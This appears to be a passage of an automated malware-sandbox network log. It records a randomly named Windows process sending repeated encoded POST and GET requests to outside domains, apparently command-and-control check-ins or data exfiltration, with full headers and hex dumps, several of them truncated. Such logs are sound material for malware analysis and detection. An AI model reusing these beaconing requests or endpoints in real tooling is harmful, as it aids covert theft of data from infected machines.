Oct 7, 2024 11:51:57.746470928 CEST	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:51:57 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.30	49773	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:02.989840984 CEST	674	OUT	POST /pnbu/ HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.nodigitalsmoke.org Referer: http://www.nodigitalsmoke.org/pnbu/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 41 56 45 33 4e 38 4a 74 6a 51 48 68 68 68 77 73 6e 73 6e 74 63 4d 69 52 68 4b 4b 63 39 67 56 64 35 36 65 4d 4b 37 63 66 55 35 6d 69 72 35 63 6d 36 67 45 58 65 73 58 2f 31 6a 58 68 59 57 49 4e 4c 77 79 6c 77 75 4e 69 62 43 46 57 5a 68 56 4d 56 32 52 4c 64 44 49 56 30 5a 6f 38 4e 56 32 59 6c 2f 35 48 61 59 42 4a 67 43 4a 32 63 64 34 6f 51 42 4a 42 49 35 77 59 69 74 42 76 72 71 64 37 57 4d 50 4e 6d 6f 75 4c 57 48 67 4a 46 64 6e 47 4a 4d 68 75 2b 71 64 4e 4b 48 4a 30 55 67 54 77 57 54 46 2b 34 4f 6c 33 32 35 57 2b 2f 64 73 57 41 72 66 48 71 77 3d 3d Data Ascii: VzK4o8Jx=COAMvoC7/KgkAVE3N8JtjQHhhhwsnsntcMiRhKKc9gVd56eMK7cfU5mir5cm6gEXesX/1jXhYWINLwylwuNibCFWZhVMV2RLdDIV0Zo8NV2Yl/5HaYBJgCJ2cd4oQBJBI5wYitBvrqd7WMPNmouLWHgJFdnGJMhu+qdNKHJ0UgTwWTF+4Ol325W+/dsWArfHqw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.30	49774	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:05.622147083 CEST	694	OUT	POST /pnbu/ HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.nodigitalsmoke.org Referer: http://www.nodigitalsmoke.org/pnbu/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 61 30 30 33 65 64 4a 74 68 77 48 69 75 42 77 73 6f 4d 6e 70 63 4d 2b 52 68 50 72 42 38 54 78 64 35 59 47 4d 4e 36 63 66 52 35 6d 69 73 4a 63 70 6b 51 45 41 65 74 72 4a 31 68 7a 68 59 57 4d 4e 4c 78 43 6c 7a 59 46 68 62 53 46 59 4d 78 56 30 4c 47 52 4c 64 44 49 56 30 59 4d 57 4e 56 2b 59 6b 4f 4a 48 4c 4b 35 49 2f 79 4a 35 64 64 34 6f 48 52 49 4b 49 35 77 2b 69 73 64 4a 72 76 5a 37 57 4a 4c 4e 6e 35 75 4d 66 48 67 50 49 39 6d 74 49 70 59 42 31 5a 78 6e 4f 6e 38 6f 57 6c 62 65 54 45 30 6b 6c 4e 52 31 6c 5a 71 54 6a 63 42 2b 43 70 65 63 33 33 56 4e 4b 44 56 78 4c 49 34 68 2b 32 71 6c 73 57 73 66 58 52 34 3d Data Ascii: VzK4o8Jx=COAMvoC7/Kgka003edJthwHiuBwsoMnpcM+RhPrB8Txd5YGMN6cfR5misJcpkQEAetrJ1hzhYWMNLxClzYFhbSFYMxV0LGRLdDIV0YMWNV+YkOJHLK5I/yJ5dd4oHRIKI5w+isdJrvZ7WJLNn5uMfHgPI9mtIpYB1ZxnOn8oWlbeTE0klNR1lZqTjcB+Cpec33VNKDVxLI4h+2qlsWsfXR4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.30	49775	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:08.261852026 CEST	2578	OUT	POST /pnbu/ HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.nodigitalsmoke.org Referer: http://www.nodigitalsmoke.org/pnbu/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 43 4f 41 4d 76 6f 43 37 2f 4b 67 6b 61 30 30 33 65 64 4a 74 68 77 48 69 75 42 77 73 6f 4d 6e 70 63 4d 2b 52 68 50 72 42 38 54 35 64 2b 70 6d 4d 4c 59 30 66 57 35 6d 69 6a 5a 63 35 6b 51 45 64 65 73 43 41 31 68 2f 78 59 56 6b 4e 49 54 4b 6c 32 71 74 68 49 79 46 59 54 42 56 50 56 32 52 65 64 44 59 52 30 59 63 57 4e 56 2b 59 6b 4d 42 48 4c 59 42 49 73 69 4a 32 63 64 34 6b 51 42 49 69 49 35 34 41 69 76 77 79 72 71 6c 37 57 2b 48 4e 6e 4c 57 4d 66 48 67 50 43 64 6d 77 49 70 63 41 31 5a 6f 77 4f 6d 31 56 57 52 6a 65 53 6c 31 77 2b 63 56 30 2b 62 75 6a 71 2f 55 44 45 49 53 53 33 55 46 78 61 46 46 64 61 49 30 37 31 67 32 49 38 32 68 61 4f 6e 4a 5a 76 37 38 70 6c 2b 63 50 76 36 6c 47 33 38 4c 45 63 48 6c 6f 72 57 63 4e 68 53 6a 63 44 54 30 72 6b 4a 2b 52 61 79 6c 71 44 6f 38 38 65 64 55 49 6b 4c 6d 2b 73 6a 43 6b 35 79 37 6b 4e 6a 70 6f 38 6a 46 34 4f 6e 71 67 62 6e 6b 73 48 5a 4e 73 31 6d 59 42 50 70 69 65 6f 37 39 41 76 4d 74 46 4c 45 36 4a 33 6d 56 38 62 32 63 50 73 6b 76 78 75 [TRUNCATED] Data Ascii: VzK4o8Jx=COAMvoC7/Kgka003edJthwHiuBwsoMnpcM+RhPrB8T5d+pmMLY0fW5mijZc5kQEdesCA1h/xYVkNITKl2qthIyFYTBVPV2RedDYR0YcWNV+YkMBHLYBIsiJ2cd4kQBIiI54Aivwyrql7W+HNnLWMfHgPCdmwIpcA1ZowOm1VWRjeSl1w+cV0+bujq/UDEISS3UFxaFFdaI071g2I82haOnJZv78pl+cPv6lG38LEcHlorWcNhSjcDT0rkJ+RaylqDo88edUIkLm+sjCk5y7kNjpo8jF4OnqgbnksHZNs1mYBPpieo79AvMtFLE6J3mV8b2cPskvxum5oan0+zbd94BLvCrgbzmAO/r6WC1gvnvF6K4ubGMsVB4B2jeGI9H59iM6pmOS7yomF4PK9MKDYIoHMTgZhBm8YNK50PCcg6rJcg8cI/qfWEJ+ztbFSWQVzT+cZOM93esPZGI1yb82jbG4049/7prlaOhrQpQ+RlasQNRq9eJtwddI/Jj83L5hM4kFOUoxScu/80Jl2mTjpq/AMEO85f5bqSxqJ5D3+7tT+5u9mcbX7oH2xro4pdenGV2XOHw+Ed//0C3gBt20Sp6Pph7mZTYVT9iLUP1LUjFWWw5faLaaZCdDEOBpU4AtZSpsy7SgG2Jm1nAGKc6pMvXqHkeo0YOjLvNaLF5MUVD2LMFzxHSTYVzEn70WAVzyiVeNY2+izC4xJb4tLeBu+dQe8hYjmF7fMjhEZeQtcXeEO44Rjp3t4dGPXkGKdlqQVwERleX5JhvlMZ0SJ1HL8lPoDbgxrCjZxG8HEWCfAISNq8D2fznB239If8AjCq7msnObCMVFJ4z7Rt/J7+nj673gDudPxarr9Zrw2Y0z4DxSNC8DlboJvyst1l21C14yGx9gm0i+Owv/7C1cJFdmhePDEG0c2oV84Xc8batKFCQ/cFwN2BhaEaGkIPt85OmD+3iwSE/Qw4aJek3rqY+GT6kd0W7+ZDdi+/YcXYZCNRmH [TRUNCATED]
Oct 7, 2024 11:52:08.261881113 CEST	1233	OUT	Data Raw: 53 56 49 6f 44 5a 5a 71 74 68 71 73 4b 70 48 6b 4f 39 76 79 67 4b 45 4a 56 73 39 6b 56 70 61 66 4a 68 69 4c 55 64 55 58 46 46 65 45 61 67 32 2b 30 6a 34 32 34 34 7a 4b 32 38 35 55 30 43 68 79 59 46 57 74 2b 4c 58 6f 47 59 62 57 41 31 2b 48 79 4f Data Ascii: SVIoDZZqthqsKpHkO9vygKEJVs9kVpafJhiLUdUXFFeEag2+0j4244zK285U0ChyYFWt+LXoGYbWA1+HyOF13NKvReGGhazdkmAkfmBT3ax66dwcEeiAHG/EQBGCP1/FS1Wh7JfEtjDMT/lds0OGxOgKFv1ydrI78vv70xQrfTFm/3MwwvVLzr9oM8IZTekrNAVkvw07pUAca0sEn4+m/YQcraOO6y6/Jaejo7SymLX6HFiHr7o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.11.30	49776	3.33.130.190	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:10.899749994 CEST	395	OUT	GET /pnbu/?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6 HTTP/1.1 Host: www.nodigitalsmoke.org Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Oct 7, 2024 11:52:13.924356937 CEST	397	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 07 Oct 2024 09:52:13 GMT Content-Type: text/html Content-Length: 257 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 56 7a 4b 34 6f 38 4a 78 3d 50 4d 6f 73 73 65 4f 42 34 6f 67 4a 51 55 51 71 54 63 52 39 6b 7a 36 52 6c 54 52 69 6f 50 7a 6b 4d 39 65 76 72 61 33 62 77 42 49 69 6d 62 44 52 49 74 59 66 54 74 6d 6e 2b 59 64 36 79 6e 49 68 62 64 72 37 6a 30 37 4e 50 57 51 78 61 53 36 62 30 76 63 49 58 33 74 79 56 53 39 2b 4b 32 31 66 49 77 49 72 37 49 73 4c 47 41 43 72 69 4c 56 6f 61 34 77 75 6a 79 73 3d 26 30 7a 75 38 41 3d 6f 32 79 6c 6e 36 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?VzK4o8Jx=PMosseOB4ogJQUQqTcR9kz6RlTRioPzkM9evra3bwBIimbDRItYfTtmn+Yd6ynIhbdr7j07NPWQxaS6b0vcIX3tyVS9+K21fIwIr7IsLGACriLVoa4wujys=&0zu8A=o2yln6"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.30	49777	194.58.112.174	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:19.916301012 CEST	644	OUT	POST /pisq/ HTTP/1.1 Host: www.synd.fun Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.synd.fun Referer: http://www.synd.fun/pisq/ Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4b 35 57 6f 36 4d 74 6d 77 67 71 31 78 6f 53 39 71 2b 51 4d 71 31 71 4e 41 55 63 6f 38 7a 49 72 6a 41 53 46 58 69 2f 38 65 79 54 6f 4c 2b 6f 48 4f 4a 55 62 37 6a 49 66 4f 37 32 34 79 48 56 64 62 51 30 36 31 65 4c 6b 6e 77 47 42 43 7a 6f 4a 76 36 2b 6e 63 61 73 57 76 47 61 43 47 6d 65 47 2b 46 77 71 67 6e 46 73 30 66 67 6b 46 63 4a 50 77 6f 4a 73 7a 30 6d 32 4a 6f 31 64 51 36 4d 72 6e 72 43 50 6a 41 5a 42 44 72 45 55 33 2f 69 4a 6c 33 79 69 32 4f 78 39 59 74 42 2b 56 6b 57 34 73 70 48 52 64 51 79 55 2b 6a 59 43 31 34 75 2b 32 7a 6e 41 2b 6e 43 38 4a 42 34 42 63 69 69 63 66 77 3d 3d Data Ascii: VzK4o8Jx=K5Wo6Mtmwgq1xoS9q+QMq1qNAUco8zIrjASFXi/8eyToL+oHOJUb7jIfO724yHVdbQ061eLknwGBCzoJv6+ncasWvGaCGmeG+FwqgnFs0fgkFcJPwoJsz0m2Jo1dQ6MrnrCPjAZBDrEU3/iJl3yi2Ox9YtB+VkW4spHRdQyU+jYC14u+2znA+nC8JB4Bciicfw==
Oct 7, 2024 11:52:20.156311035 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:52:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 [TRUNCATED] Data Ascii: e2cZmo_qdCKrtu-HI6+4hW`Can^@>\dq[}9<oGh6_F[#J^QF%QT$AFK0Nzr-"RtMGm Tr:QQQs<'rktUc]DN1.r0)FInIBrzYy\| AMU+68i]?s#[(v+\eG4d#WX._nVI=T@z#\-?8dXF0bGFfQ}f0i$<l;HFKwEk(2\K~r.Jt);G$R`x/~Em\|'ywow+uxAaxt&V;oo(hQ,.9soCf~rnf<tUz-o/,=?@FaQtm'Pr>\4znz;hL_m`T=\4(\|/_BJ~b&/B=e#zKA.yZ.!fqDuVwBk)Xp`(WPVlhbR7'$G)T]=s-ku2r%A&t^#bN}<\|%$7E\|?a\|OQ!bB!dV,&bH;9=S6]ve~H]>8 [TRUNCATED]
Oct 7, 2024 11:52:20.156388998 CEST	1289	IN	Data Raw: 4e 38 6a 6b 93 e7 92 b4 7d 30 dc 00 31 d1 53 e8 f7 cf 88 74 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e a6 77 93 cf 75 48 a4 e2 ba 05 c2 4c f1 cc 11 6a 94 a7 b0 05 5a d8 50 32 1a 05 4a 27 77 93 d9 65 8c d3 ca de 1b 0e ec 48 7a 5f a0 86 fd 0d 32 90 fd 1d Data Ascii: N8jk}01St/"DNwuHLjZP2J'weHz_2&Irk>P$"E!`nC;:7P[`5HP6Lx<M?Nb"Dr[P" aL_P1@k}ZZP16Yxl\|[3&
Oct 7, 2024 11:52:20.156402111 CEST	1236	IN	Data Raw: 5a b2 57 91 4f 71 aa 01 2f 29 6c 18 3d 80 2c d8 30 00 2d 73 4e 96 c7 08 ca 40 c0 d4 9f 40 d8 74 44 3a 6f d9 13 6b af bd 69 70 f2 92 67 94 68 8c 2e d2 35 37 6f 33 a5 5b 4e e9 d6 29 18 88 cf b9 9e 7a 58 97 6e 20 15 8e 1c 0f 79 68 37 b7 61 e1 70 6c Data Ascii: ZWOq/)l=,0-sN@@tD:okipgh.57o3[N)zXn yh7aplCwd$+z(\|QTn"pP~L5~d/M~6e h_?)G`\Ps(NFRl>?tz(9~\|I&Y]ysR^-WEg5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.30	49778	194.58.112.174	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:22.691384077 CEST	664	OUT	POST /pisq/ HTTP/1.1 Host: www.synd.fun Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.synd.fun Referer: http://www.synd.fun/pisq/ Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4b 35 57 6f 36 4d 74 6d 77 67 71 31 77 49 43 39 73 74 34 4d 36 6c 71 53 64 6b 63 6f 31 54 49 76 6a 41 65 46 58 6a 37 73 65 42 37 6f 4c 62 73 48 50 49 55 62 38 6a 49 66 42 62 32 78 73 33 56 47 62 51 35 50 31 66 48 6b 6e 77 53 42 43 79 59 4a 76 4e 4b 6b 64 4b 73 55 6b 6d 61 36 59 57 65 47 2b 46 77 71 67 6d 68 47 30 66 34 6b 46 73 35 50 79 4d 64 76 36 55 6d 31 66 34 31 64 55 36 4e 44 6e 72 43 78 6a 45 42 72 44 6f 38 55 33 2b 53 4a 6c 44 6d 6c 38 4f 77 58 48 39 41 69 62 30 2b 33 6b 74 6e 41 4f 67 71 4b 77 32 59 4e 77 76 66 6b 72 77 54 43 74 48 2b 52 56 41 56 70 65 67 6a 48 43 78 34 4f 73 79 36 4b 61 35 6d 59 4f 62 6e 72 61 72 63 58 69 53 38 3d Data Ascii: VzK4o8Jx=K5Wo6Mtmwgq1wIC9st4M6lqSdkco1TIvjAeFXj7seB7oLbsHPIUb8jIfBb2xs3VGbQ5P1fHknwSBCyYJvNKkdKsUkma6YWeG+FwqgmhG0f4kFs5PyMdv6Um1f41dU6NDnrCxjEBrDo8U3+SJlDml8OwXH9Aib0+3ktnAOgqKw2YNwvfkrwTCtH+RVAVpegjHCx4Osy6Ka5mYObnrarcXiS8=
Oct 7, 2024 11:52:22.922369957 CEST	1289	IN	Data Raw: 4e 38 6a 6b 93 e7 92 b4 7d 30 dc 00 31 d1 53 e8 f7 cf 88 74 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e a6 77 93 cf 75 48 a4 e2 ba 05 c2 4c f1 cc 11 6a 94 a7 b0 05 5a d8 50 32 1a 05 4a 27 77 93 d9 65 8c d3 ca de 1b 0e ec 48 7a 5f a0 86 fd 0d 32 90 fd 1d Data Ascii: N8jk}01St/"DNwuHLjZP2J'weHz_2&Irk>P$"E!`nC;:7P[`5HP6Lx<M?Nb"Dr[P" aL_P1@k}ZZP16Yxl\|[3&
Oct 7, 2024 11:52:22.922487020 CEST	1289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 09:52:22 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 32 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3e e7 5c 92 a2 64 c9 71 92 b5 ab 00 5b d4 e5 7d 39 f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 5f d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 d4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e e3 1d 97 7a 72 a0 1a a5 a1 0c fa 8e d7 2d 09 db f7 22 e5 a1 52 a0 ba c1 c8 08 d0 e7 74 cd 4d 47 6d 0d fd 20 2a 54 dd 72 3a 51 af d1 51 9b 8e ad 0c fe 51 73 3c 27 72 a4 6b 84 b6 74 55 63 19 5d 44 4e e4 aa e6 d6 d6 96 19 8e bd 8e b9 31 f2 ea 96 2e ab bb 8e d7 17 81 72 1b a5 30 1a bb 2a ec 29 85 ee 07 aa e3 c8 46 49 ba 6e 49 f4 02 b5 91 0b c9 42 19 72 14 f9 a6 1d 86 e8 7a d2 de 81 f8 59 ed 0d 09 79 7c cf c4 bf d5 e5 92 20 bd 41 4d 03 d9 55 d6 15 83 2b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 [TRUNCATED] Data Ascii: e2cZmo_qdCKrtu-HI6+4hW`Can^@>\dq[}9<oGh6_F[#J^QF%QT$AFK0Nzr-"RtMGm Tr:QQQs<'rktUc]DN1.r0)FInIBrzYy\| AMU+68i]?s#[(v+\eG4d#WX._nVI=T@z#\-?8dXF0bGFfQ}f0i$<l;HFKwEk(2\K~r.Jt);G$R`x/~Em\|'ywow+uxAaxt&V;oo(hQ,.9soCf~rnf<tUz-o/,=?@FaQtm'Pr>\4znz;hL_m`T=\4(\|/_BJ~b&/B=e#zKA.yZ.!fqDuVwBk)Xp`(WPVlhbR7'$G)T]=s-ku2r%A&t^#bN}<\|%$7E\|?a\|OQ!bB!dV,&bH;9=S6]ve~H]>8 [TRUNCATED]
Oct 7, 2024 11:52:22.922576904 CEST	1236	IN	Data Raw: 5a b2 57 91 4f 71 aa 01 2f 29 6c 18 3d 80 2c d8 30 00 2d 73 4e 96 c7 08 ca 40 c0 d4 9f 40 d8 74 44 3a 6f d9 13 6b af bd 69 70 f2 92 67 94 68 8c 2e d2 35 37 6f 33 a5 5b 4e e9 d6 29 18 88 cf b9 9e 7a 58 97 6e 20 15 8e 1c 0f 79 68 37 b7 61 e1 70 6c Data Ascii: ZWOq/)l=,0-sN@@tD:okipgh.57o3[N)zXn yh7aplCwd$+z(\|QTn"pP~L5~d/M~6e h_?)G`\Ps(NFRl>?tz(9~\|I&Y]ysR^-WEg5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.30	49779	194.58.112.174	80	580	C:\Program Files (x86)\VpYsnfbFknITiAgrVTGVAGPEJlBjDtgJYuqjUdKiDtiFbyXeCTqJbaCKYmjFsscwE\MBLUUsWuClSd.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 11:52:25.473218918 CEST	1289	OUT	POST /pisq/ HTTP/1.1 Host: www.synd.fun Accept: / Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.synd.fun Referer: http://www.synd.fun/pisq/ Connection: close Content-Length: 3341 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36 Data Raw: 56 7a 4b 34 6f 38 4a 78 3d 4b 35 57 6f 36 4d 74 6d 77 67 71 31 77 49 43 39 73 74 34 4d 36 6c 71 53 64 6b 63 6f 31 54 49 76 6a 41 65 46 58 6a 37 73 65 42 6a 6f 4b 74 51 48 4f 72 38 62 39 6a 49 66 66 4c 32 30 73 33 55 47 62 52 52 44 31 66 37 30 6e 79 71 42 51 42 51 4a 70 38 4b 6b 55 4b 73 55 72 47 61 42 47 6d 65 70 2b 45 41 75 67 6e 52 47 30 66 34 6b 46 71 56 50 6b 49 4a 76 32 30 6d 32 4a 6f 31 42 51 36 4e 34 6e 72 72 4b 6a 45 56 52 44 71 73 55 33 70 57 4a 6c 51 65 6c 38 4f 77 58 50 64 41 76 62 30 69 30 6b 70 7a 63 4f 68 53 61 78 43 67 4e 38 62 6d 70 34 51 54 46 73 56 36 2f 66 6b 5a 6c 4b 41 6a 77 63 52 42 73 38 78 43 58 63 64 36 31 4e 37 6e 4f 4c 75 49 4a 33 46 38 6b 35 6d 41 67 4a 72 32 38 74 36 6b 79 41 62 61 32 54 74 55 2b 79 73 65 69 34 67 41 69 78 67 51 4b 2b 6f 67 53 65 47 71 48 77 4d 62 43 74 64 41 70 47 6d 57 2b 4b 71 66 46 50 64 36 52 41 6c 46 68 45 35 43 4b 65 71 59 51 67 33 54 41 45 67 55 46 56 77 78 67 59 6d 76 68 61 55 41 67 57 68 45 44 37 42 38 67 57 6c 66 49 43 4e 67 5a 71 6f 41 59 41 [TRUNCATED] Data Ascii: 